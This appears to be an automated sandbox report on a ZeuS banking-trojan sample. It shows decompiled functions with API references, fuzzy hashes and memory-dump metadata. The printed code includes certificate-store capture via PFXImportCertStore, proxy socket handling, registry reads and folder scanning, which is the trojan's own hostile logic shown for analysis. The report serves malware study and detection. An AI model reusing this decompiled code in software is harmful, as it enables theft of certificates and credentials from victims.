Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: File$PointerWrite$BuffersFlush
String ID:
API String ID: 1289656144-0
Opcode ID: 1b70c79d7aee250bc85e933313c7332d14f3057d7f445de79f5f13660f7bede3
Instruction ID: 19847be25fcb5b6c213091afc22bc3ab4aca455bc7c3533542e6700c800701b7
Opcode Fuzzy Hash: 1b70c79d7aee250bc85e933313c7332d14f3057d7f445de79f5f13660f7bede3
Instruction Fuzzy Hash: A7314A76800208FFDF119FA9CC49EAEBBB9EF04344F10857AF690B51A0D33A8955DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004178F4, Relevance: 6.1, APIs: 4, Instructions: 69
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004178F4(void* __ebx, void* __ecx) {
				char _v20;
				char* _v84;
				char _v92;
				char _v196;
				char _v716;
				void* __edi;
				void* __esi;
				void* _t15;
				void* _t31;
				void* _t35;
				void* _t36;
				char _t37;
				void** _t43;

				_t36 = __ecx;
				_t35 = __ebx;
				_t15 =  *(__ebx + 0x180);
				if(_t15 == 0 || WaitForSingleObject(_t15, 0) != 0x102) {
					_t2 = _t35 + 0x17c; // 0x17c
					_t43 = _t2;
					E00406BF5(_t43);
					E0041CC9C(_t36,  &_v716, _t43, 1);
					E0041C946(0x2937498d,  &_v196, 0);
					_t37 = 0x44;
					E00405299( &_v92,  &_v92, 0, _t37);
					_v92 = _t37;
					_v84 =  &_v196;
					ResetEvent( *(_t35 + 0xc));
					if(E00406AAD( &_v716, 0x404a5c, 0,  &_v92,  &_v20) != 0) {
						E00405222(_t43,  &_v20, 0x10);
						if(WaitForSingleObject( *(_t35 + 0xc), 0x3e8) == 0) {
							goto L6;
						} else {
							TerminateProcess( *_t43, 0);
							E00406BF5(_t43);
							goto L3;
						}
					} else {
						L3:
						_t31 = 0;
					}
				} else {
					L6:
					_t31 = 1;
				}
				return _t31;
			}

0x004178f4
0x004178f4
0x004178f7
0x00417907
0x0041791d
0x0041791d
0x00417923
0x00417930
0x00417944
0x0041794b
0x00417952
0x00417960
0x00417963
0x00417966
0x00417988
0x00417995
0x004179aa
0x00000000
0x004179ac
0x004179af
0x004179b5
0x00000000
0x004179b5
0x0041798a
0x0041798a
0x0041798a
0x0041798a
0x004179bc
0x004179bc
0x004179bc
0x004179bc
0x004179c1

APIs

WaitForSingleObject.KERNEL32(?,00000000,?,74B5F6F0), ref: 0041790C
ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001,?,74B5F6F0), ref: 00417966
WaitForSingleObject.KERNEL32(?,000003E8,0000017C,?,00000010,?,00404A5C,00000000,?,?,?,74B5F6F0), ref: 004179A2
TerminateProcess.KERNEL32(0000017C,00000000,?,74B5F6F0), ref: 004179AF

Part of subcall function 00406BF5: CloseHandle.KERNEL32(?,74B5F560,0040D69A,00000000,00423238,00000000,0040D7CC,00000000,00000000), ref: 00406C04
Part of subcall function 00406BF5: CloseHandle.KERNEL32(?,74B5F560,0040D69A,00000000,00423238,00000000,0040D7CC,00000000,00000000), ref: 00406C0D

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CloseHandleObjectSingleWait$EventProcessResetTerminate
String ID:
API String ID: 401097067-0
Opcode ID: fdea1ff227083993a32c430f71c82fb37e5929bc2948f65656ef56ca7baa2d80
Instruction ID: ae3d572f0ef769e056b6780fd7fff903f71f8541cac2adee4be0fa97637ad405
Opcode Fuzzy Hash: fdea1ff227083993a32c430f71c82fb37e5929bc2948f65656ef56ca7baa2d80
Instruction Fuzzy Hash: 9711A2B1500208AAEF10ABA5DC49FEF777CEF45704F00407AF505FA1A5DA789985CE68

Uniqueness

Uniqueness Score: -1.00%

Function 00408953, Relevance: 6.0, APIs: 4, Instructions: 42
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408953(HANDLE* _a4) {
				struct tagMSG _v28;
				long _t16;

				while(1) {
					_t16 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4ff);
					if(_t16 != 1) {
						break;
					}
					while(PeekMessageW( &_v28, 0, 0, 0, 1) != 0) {
						if(_v28.message != 0x12) {
							TranslateMessage( &_v28);
							DispatchMessageW( &_v28);
							continue;
						}
						goto L5;
					}
				}
				L5:
				return _t16;
			}

0x0040899a
0x004089a6
0x004089ab
0x00000000
0x00000000
0x00408986
0x0040896e
0x00408975
0x00408980
0x00000000
0x00408980
0x00000000
0x0040896e
0x00408986
0x004089ae
0x004089b6

APIs

PeekMessageW.USER32 ref: 00408990
MsgWaitForMultipleObjects.USER32 ref: 004089A4

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: MessageMultipleObjectsPeekWait
String ID:
API String ID: 3986374578-0
Opcode ID: f9295c5c42b952baa99d33bcf44ac01872aaac9d889ff29f2e4e36e76c222aff
Instruction ID: 16ad5014ffac0bb05be3796538b3f0bad48346fc68fccfb5046419e96cdb12ee
Opcode Fuzzy Hash: f9295c5c42b952baa99d33bcf44ac01872aaac9d889ff29f2e4e36e76c222aff
Instruction Fuzzy Hash: C7F0227250020ABBC710BAA8DE48D67BB9CEB41360F05053BF680F21B0D67A980486B6

Uniqueness

Uniqueness Score: -1.00%

Function 0041BD55, Relevance: 6.0, APIs: 4, Instructions: 40
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BD55(void* __eflags) {
				void* _t1;
				long _t6;
				void* _t12;

				_t1 = E0041C97E(_t12, 0x19367401, 1);
				_t19 = _t1;
				if(_t1 != 0) {
					if(E0041CAA4() == 0) {
						L7:
						E004089B9(_t19);
						return 0;
					}
					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
					_t6 = WaitForSingleObject( *0x423e74, 0x1388);
					while(_t6 == 0x102) {
						E00404FF7();
						_t6 = WaitForSingleObject( *0x423e74, 0x1388);
					}
					goto L7;
				}
				return _t1 + 1;
			}

0x0041bd5d
0x0041bd62
0x0041bd66
0x0041bd72
0x0041bdb6
0x0041bdb7
0x00000000
0x0041bdbc
0x0041bd80
0x0041bd98
0x0041bdaf
0x0041bda1
0x0041bdad
0x0041bdad
0x00000000
0x0041bdb5
0x00000000

APIs

Part of subcall function 0041C97E: CreateMutexW.KERNEL32(004239E8,00000000,?,?,?,?,?), ref: 0041C99F

GetCurrentThread.KERNEL32 ref: 0041BD79
SetThreadPriority.KERNEL32(00000000,?,?,?,19367401,00000001), ref: 0041BD80
WaitForSingleObject.KERNEL32(00001388,?,?,?,19367401,00000001), ref: 0041BD98

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Thread$CreateCurrentMutexObjectPrioritySingleWait
String ID:
API String ID: 3441234504-0
Opcode ID: 96a901a5f2c102acae76c295dc04c3155fb49d03ab27abc9be6df2caa8d37a79
Instruction ID: fad477193a557564e7691ba3c19ea697abed2e063f8ab1d10e928d39800346f5
Opcode Fuzzy Hash: 96a901a5f2c102acae76c295dc04c3155fb49d03ab27abc9be6df2caa8d37a79
Instruction Fuzzy Hash: E3F059716001182AD6223BB17D45DEB7A0CCF95395B200177B900E21B2CA794C8146BC

Uniqueness

Uniqueness Score: -1.00%

Function 004110BE, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 217
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004110BE(void* __eflags, signed int _a4) {
				char _v9;
				char _v13;
				char _v20;
				signed int _v24;
				signed int _v29;
				short _v31;
				signed char _v32;
				intOrPtr _v36;
				signed int _v48;
				short _v50;
				char _v52;
				char _v312;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t59;
				void* _t61;
				short _t77;
				void* _t79;
				void* _t84;
				char _t103;
				char* _t105;
				signed int _t115;
				void* _t125;
				intOrPtr _t126;
				void* _t127;
				char _t129;
				void* _t131;
				intOrPtr _t132;
				void* _t133;

				_t110 = _a4;
				_t59 = E0040879E(_t110);
				_push(0);
				_push( &_v32);
				_t61 = 7;
				_v24 = 0 | _t59 == 0x00000017;
				if(E00408199(_t61, _t110) != 0) {
					while(E00408199(1, _t110,  &_v9, 0) != 0) {
						if(_v9 == 0) {
							_t115 = _v29;
							_t116 = _t115 << 0x10;
							_v13 = 0x5a;
							if(((_t115 & 0x00ff0000 | _t115 >> 0x00000010) >> 0x00000008 | (_t115 & 0x0000ff00 | _t115 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
								L20:
								_v9 = 1;
								if(_v13 != 0x5a) {
									L44:
									return E00411048(_t110, 0xffffffff, _v13, _v24) & 0xffffff00 | _t73 != 0x00000000;
								}
								E00405299( &_v52,  &_v52, 0, 0x10);
								_t77 = 2;
								_v52 = _t77;
								_t79 = (_v32 & 0x000000ff) - 1;
								if(_t79 == 0) {
									_v50 = _v31;
									_v48 = _v29;
									_t127 = E0040822E( &_v52);
									if(_t127 == 0xffffffff) {
										L23:
										_v13 = 0x5b;
										goto L44;
									}
									E004085E1(_t116, _t127);
									_t84 = E00411048(_t110, _t127, 0x5a, _v24);
									if(_t84 != 1) {
										if(_t84 != 0xffffffff) {
											_v9 = 0;
										} else {
											_v13 = 0x5b;
										}
									} else {
										_push(_t127);
										_t84 = E004083E2(_t110);
									}
									E00408589(_t84, _t127);
									if(_v9 != 1 || _v13 == 0x5a) {
										L34:
										return _v9;
									} else {
										goto L44;
									}
								}
								if(_t79 == 1) {
									_t129 = E00408328( &_v52, 1);
									_v20 = _t129;
									if(_t129 == 0xffffffff) {
										goto L23;
									}
									_t125 = E00411048(_t110, _t129, 0x5a, _v24);
									if(_t125 != 1) {
										L31:
										E00408589(_t89, _t129);
										if(_t125 == 0xffffffff) {
											goto L23;
										}
										if(_t125 != 1) {
											_v9 = 0;
										}
										goto L34;
									}
									_t126 = E00408559( &_v20,  &_a4);
									_v36 = _t126;
									E00408589(_t93, _v20);
									if(_t126 != 0xffffffff) {
										E004085E1(_t116, _t126);
										_t110 = _a4;
										_t125 = E00411048(_a4, _t126, 0x5a, _v24 | 0x00000002);
										if(_t125 == 1) {
											_push(_v36);
											_t89 = E004083E2(_t110);
										}
										_t129 = _v36;
										goto L31;
									}
									_t110 = _a4;
									_v13 = 0x5b;
									goto L44;
								}
								goto L23;
							}
							_t131 = 0;
							while(1) {
								_t116 = _t110;
								if(E00408199(1, _t110,  &_v9, 0) == 0) {
									goto L1;
								}
								_t103 = _v9;
								 *((char*)(_t133 + _t131 - 0x134)) = _t103;
								if(_t103 == 0) {
									_t105 =  &_v312;
									_v20 = 0;
									__imp__getaddrinfo(_t105, 0, 0,  &_v20);
									if(_t105 == 0) {
										_t132 = _v20;
										while(_t132 != 0) {
											if( *((intOrPtr*)(_t132 + 4)) == 2) {
												E00405222( &_v29,  *((intOrPtr*)(_t132 + 0x18)) + 4, 4);
												L19:
												__imp__freeaddrinfo(_v20);
												if(_t132 == 0) {
													goto L12;
												}
												goto L20;
											}
											_t132 =  *((intOrPtr*)(_t132 + 0x1c));
										}
										goto L19;
									}
									L12:
									_v13 = 0x5b;
									goto L20;
								}
								_t131 = _t131 + 1;
								if(_t131 <= 0xff) {
									continue;
								}
								goto L1;
							}
							goto L1;
						}
					}
				}
				L1:
				return 0;
			}

0x004110c8
0x004110ce
0x004110de
0x004110e2
0x004110e5
0x004110e6
0x004110f2
0x00411101
0x004110ff
0x00411116
0x0041112f
0x0041113d
0x00411146
0x004111d0
0x004111d4
0x004111d8
0x00411306
0x00000000
0x00411316
0x004111e5
0x004111ec
0x004111ed
0x004111f5
0x004111f6
0x004112aa
0x004112b4
0x004112bc
0x004112c1
0x004111ff
0x004111ff
0x00000000
0x004111ff
0x004112c8
0x004112d4
0x004112dc
0x004112e9
0x004112f1
0x004112eb
0x004112eb
0x004112eb
0x004112de
0x004112de
0x004112df
0x004112df
0x004112f5
0x004112fe
0x0041129c
0x00000000
0x00000000
0x00000000
0x00000000
0x004112fe
0x004111fd
0x00411212
0x00411214
0x0041121a
0x00000000
0x00000000
0x00411228
0x0041122d
0x00411285
0x00411285
0x0041128d
0x00000000
0x00000000
0x00411296
0x00411298
0x00411298
0x00000000
0x00411296
0x0041123f
0x00411241
0x00411244
0x0041124c
0x0041125b
0x00411263
0x00411273
0x00411278
0x0041127a
0x0041127d
0x0041127d
0x00411282
0x00000000
0x00411282
0x0041124e
0x00411251
0x00000000
0x00411251
0x00000000
0x004111fd
0x0041114c
0x0041114e
0x00411156
0x0041115f
0x00000000
0x00000000
0x00411161
0x00411164
0x0041116d
0x00411183
0x0041118a
0x0041118d
0x00411195
0x0041119d
0x004111ab
0x004111a6
0x004111be
0x004111c3
0x004111c6
0x004111ce
0x00000000
0x00000000
0x00000000
0x004111ce
0x004111a8
0x004111a8
0x00000000
0x004111af
0x00411197
0x00411197
0x00000000
0x00411197
0x0041116f
0x00411176
0x00000000
0x00000000
0x00000000
0x00411178
0x00000000
0x0041114e
0x004110ff
0x00411101
0x004110f4
0x00000000

APIs

Part of subcall function 0040879E: getsockname.WS2_32(?,?,?), ref: 004087BC

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 0041118D
freeaddrinfo.WS2_32(?,?,?,00000004), ref: 004111C6

Part of subcall function 004085E1: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 004085F7

Part of subcall function 00411048: getpeername.WS2_32(000000FF,?,00000000), ref: 0041106C

Part of subcall function 004083E2: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00408482

Strings

Z, xrefs: 00411300

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: freeaddrinfogetaddrinfogetpeernamegetsocknameselectsetsockopt
String ID: Z
API String ID: 1849152701-1505515367
Opcode ID: bda9a7b6216f852b020a8c429b5e94f4953ee913da99c167451cc2c56e3fce04
Instruction ID: 94da23fed4b34e9fc977b9c1c59079a4126003b2e47befe39d186e74c2070c30
Opcode Fuzzy Hash: bda9a7b6216f852b020a8c429b5e94f4953ee913da99c167451cc2c56e3fce04
Instruction Fuzzy Hash: 1F612771D00159BADF2097A88C41AFFBBB99F49354F00056BEB51F32E1C67C8985C76A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1AA, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101
timeCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040D1AA(intOrPtr __eax, void* __ecx, intOrPtr* _a4, intOrPtr* _a8, signed int _a12) {
				char _v536;
				char _v600;
				char _v728;
				char _v744;
				struct _SYSTEMTIME _v760;
				intOrPtr _v764;
				intOrPtr _v772;
				intOrPtr _v776;
				char _v784;
				void* __edi;
				void* __esi;
				void* _t47;
				void* _t58;
				intOrPtr* _t59;
				void* _t61;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t71;
				char* _t74;
				signed int _t76;
				void* _t78;
				void* _t79;

				_t61 = __ecx;
				_t78 = (_t76 & 0xfffffff8) - 0x2fc;
				_t59 = _a4;
				__imp__PFXImportCertStore(_t59, _a8, _a12, _t67, _t71, _t58);
				_v776 = __eax;
				if(__eax != 0 && (_a12 & 0x10000000) == 0 && _t59 != 0 &&  *_t59 > 0 &&  *((intOrPtr*)(_t59 + 4)) != 0 && E0041CAA4() != 0) {
					GetSystemTime( &_v760);
					E0040F34A(0xaa,  &_v600);
					_t74 =  &_v744;
					E0040F34A(0xab, _t74);
					E0040CF89( &_v536, _t61);
					_push(_v760.wYear & 0x0000ffff);
					_push(_v760.wMonth & 0x0000ffff);
					_push(_v760.wDay & 0x0000ffff);
					_push(_t74);
					_push( &_v536);
					_push( &_v600);
					_t65 = 0x3e;
					_t47 = E00405ED9( &_v600, _t65,  &_v728);
					_t79 = _t78 + 0x18;
					if(_t47 > 0 && E004186BA(_t61, _t65, 2, 0,  &_v728,  *((intOrPtr*)(_t59 + 4)),  *_t59) != 0) {
						_t66 = _a8;
						if(_t66 != 0 &&  *_t66 != 0) {
							 *((short*)(E00405222(_t79 + 0x48 + E00405D35( &_v728) * 2, L".txt", 8) + 8)) = 0;
							_t64 = _t66;
							if(E0040603D(_t52 | 0xffffffff, _t66,  &_v784) != 0) {
								E004186BA(_t64, _t66, 2, 0,  &_v728, _v772, _v764);
								E0040602B( &_v784);
							}
						}
					}
				}
				return _v776;
			}

0x0040d1aa
0x0040d1b0
0x0040d1b7
0x0040d1c3
0x0040d1c9
0x0040d1cf
0x0040d20f
0x0040d221
0x0040d226
0x0040d22f
0x0040d23b
0x0040d245
0x0040d24b
0x0040d251
0x0040d254
0x0040d25c
0x0040d264
0x0040d267
0x0040d26c
0x0040d271
0x0040d276
0x0040d28e
0x0040d293
0x0040d2b6
0x0040d2c1
0x0040d2ca
0x0040d2dc
0x0040d2e1
0x0040d2e1
0x0040d2ca
0x0040d293
0x0040d276
0x0040d2f0

APIs

PFXImportCertStore.CRYPT32(?,?,?), ref: 0040D1C3

Part of subcall function 0041CAA4: WaitForSingleObject.KERNEL32(00000000,0041BE2C,?,19367402,00000001), ref: 0041CAAC

GetSystemTime.KERNEL32(?), ref: 0040D20F

Part of subcall function 0040CF89: GetUserNameExW.SECUR32(00000002,?,?), ref: 0040CF9E

Strings

.txt, xrefs: 0040D2A5

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CertImportNameObjectSingleStoreSystemTimeUserWait
String ID: .txt
API String ID: 1412380219-2195685702
Opcode ID: 901ad2a40a4cfbda9a69c4c3d2decc79fb24e7e498ba1897ca12a7d4cbe60e8a
Instruction ID: cade90fd5af9558148d6c10b119ad800256c64536d9f0690e5ceebb427ede80a
Opcode Fuzzy Hash: 901ad2a40a4cfbda9a69c4c3d2decc79fb24e7e498ba1897ca12a7d4cbe60e8a
Instruction Fuzzy Hash: 9431CF31604341ABCB20EF95CD45BABB7A9EF98305F00097FB984A71D1D738D948C76A

Uniqueness

Uniqueness Score: -1.00%

Function 00412BCB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00404A38,00000000,00004401,00404A48,?), ref: 00412BFB
CoCreateInstance.OLE32(00404A08,00000000,00004401,00404A18,?), ref: 00412C4E

Strings

D, xrefs: 00412C79

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CreateInstance
String ID: D
API String ID: 542301482-2746444292
Opcode ID: 5bfe643f0e49c06fc9732a4f0190cc34f5f85f7c3735e7efb51cb142788ab48f
Instruction ID: b6c6c253125a87d8736695c8f43ed9f275c7928a91f0e650ad4828ee0d1e70bb
Opcode Fuzzy Hash: 5bfe643f0e49c06fc9732a4f0190cc34f5f85f7c3735e7efb51cb142788ab48f
Instruction Fuzzy Hash: 80317EB2204205AFD710DF54C984EAFB7E8AB84744F00052EFA54E7250E774DC558BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0041D6DE, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041D6DE(void* __ecx) {
				signed int _v8;
				void* _v12;
				char _v16;
				char _v364;
				char _v504;
				void* __edi;
				void* _t32;

				if( *0x423f60 == 0) {
					E0041CD2B(0x423e7c, __ecx, 1, 0x423f60);
				}
				_v8 = _v8 & 0x00000000;
				_t30 =  &_v12;
				_v12 = 0x80000001;
				if(RegOpenKeyExW(0x80000001, 0x423f60, 0, 1,  &_v12) != 0) {
					_t32 = 0xffffffffffffffff;
				} else {
					_t32 = E004094B9( &_v12, 0x423e7c,  &_v16,  &_v8);
				}
				if(_t32 != 0xffffffff) {
					if(_v16 == 3) {
						E0041CC4A(_t30,  &_v504);
						if(E0040AF81(_v8, _t30, _t32,  &_v364) == 0) {
							goto L8;
						}
						return _v8;
					}
					L8:
					E004051E6(_v8);
					goto L6;
				} else {
					L6:
					return 0;
				}
			}

0x0041d6fb
0x0041d702
0x0041d702
0x0041d707
0x0041d70b
0x0041d71a
0x0041d725
0x0041d73c
0x0041d727
0x0041d738
0x0041d738
0x0041d742
0x0041d74c
0x0041d75f
0x0041d775
0x00000000
0x00000000
0x00000000
0x0041d777
0x0041d74e
0x0041d751
0x00000000
0x0041d744
0x0041d744
0x00000000
0x0041d744

APIs

RegOpenKeyExW.ADVAPI32(80000001,00423F60,00000000,00000001,?), ref: 0041D71D

Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9

Strings

`?B, xrefs: 0041D6F1
|>B, xrefs: 0041D6F6

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: FreeHeapOpen
String ID: `?B$|>B
API String ID: 527778110-1785315158
Opcode ID: 2ae9f4bc2e17b7b92e88a80f2b32a20041b3887edd93971b1425a059848cf30f
Instruction ID: 2adeda7552dcc31da1d879cbc741725ae2f1e5d6a06bef057745dca32a2a01de
Opcode Fuzzy Hash: 2ae9f4bc2e17b7b92e88a80f2b32a20041b3887edd93971b1425a059848cf30f
Instruction Fuzzy Hash: 1A11A3B2E00108BADB20D6A9DD45BDF77BC9B44364F100277A525E21C0D7BC9B859B59

Uniqueness

Uniqueness Score: -1.00%

Function 0041492A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041492A(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				char _v572;
				void* __edi;
				void* __esi;
				char* _t22;
				signed int _t30;
				char* _t32;
				void* _t34;

				_t32 =  &_v52;
				E0040F34A(0x81, _t32);
				_v16 = _t32;
				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				E00405299( &_v12,  &_v12, 0, 8);
				_t30 = 0;
				do {
					_t22 =  &_v572;
					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
					_t37 = _t22;
					if(_t22 == 0) {
						_t29 =  &_v16;
						E0040A91B( &_v572,  &_v16, _t37, 1, 2, E0041468F,  &_v12, 0, 0, 0);
					}
					_t30 = _t30 + 1;
				} while (_t30 < 3);
				if(_v8 <= 0) {
					return E004051E6(_v12);
				}
				return E0041293E(_t29, _v12, 0xcb);
			}

0x00414935
0x0041493d
0x00414946
0x00414950
0x00414957
0x0041495e
0x00414965
0x0041496a
0x0041496c
0x0041496c
0x0041497a
0x00414980
0x00414982
0x00414994
0x0041499d
0x0041499d
0x004149a2
0x004149a3
0x004149ab
0x00000000
0x004149c4
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0041497A

Part of subcall function 0040A91B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040A95A
Part of subcall function 0040A91B: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040A981
Part of subcall function 0040A91B: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040A9CB
Part of subcall function 0040A91B: Sleep.KERNEL32(00000000,?,?), ref: 0040AA28
Part of subcall function 0040A91B: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040AA56
Part of subcall function 0040A91B: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040AA68

Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9

Strings

&, xrefs: 00414950
#, xrefs: 0041495E

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&
API String ID: 3438805939-3870246384
Opcode ID: 1e4f787ab8bb824a08517f25c2e885915770b9e3e9f5b9644a340dbc88cdedc9
Instruction ID: 75d2f66cf28c6e64b97718bc9e945e1cbc3c88ce406780d93764e2d673975ac3
Opcode Fuzzy Hash: 1e4f787ab8bb824a08517f25c2e885915770b9e3e9f5b9644a340dbc88cdedc9
Instruction Fuzzy Hash: 2B1170B1A012287ADB209B96DC09FDF7F7CEF81314F00416AF505B6180D7785B85CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041524B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041524B(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v60;
				char _v580;
				void* __edi;
				void* __esi;
				char* _t22;
				signed int _t30;
				char* _t32;
				void* _t34;

				_t32 =  &_v60;
				E0040F34A(0x95, _t32);
				_v16 = _t32;
				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				E00405299( &_v12,  &_v12, 0, 8);
				_t30 = 0;
				do {
					_t22 =  &_v580;
					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
					_t37 = _t22;
					if(_t22 == 0) {
						_t29 =  &_v16;
						E0040A91B( &_v580,  &_v16, _t37, 1, 2, E00414FBC,  &_v12, 0, 0, 0);
					}
					_t30 = _t30 + 1;
				} while (_t30 < 3);
				if(_v8 <= 0) {
					return E004051E6(_v12);
				}
				return E0041293E(_t29, _v12, 0xcb);
			}

0x00415256
0x0041525e
0x00415267
0x00415271
0x00415278
0x0041527f
0x00415286
0x0041528b
0x0041528d
0x0041528d
0x0041529b
0x004152a1
0x004152a3
0x004152b5
0x004152be
0x004152be
0x004152c3
0x004152c4
0x004152cc
0x00000000
0x004152e5
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0041529B

Part of subcall function 0040A91B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040A95A
Part of subcall function 0040A91B: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040A981
Part of subcall function 0040A91B: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040A9CB
Part of subcall function 0040A91B: Sleep.KERNEL32(00000000,?,?), ref: 0040AA28
Part of subcall function 0040A91B: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040AA56
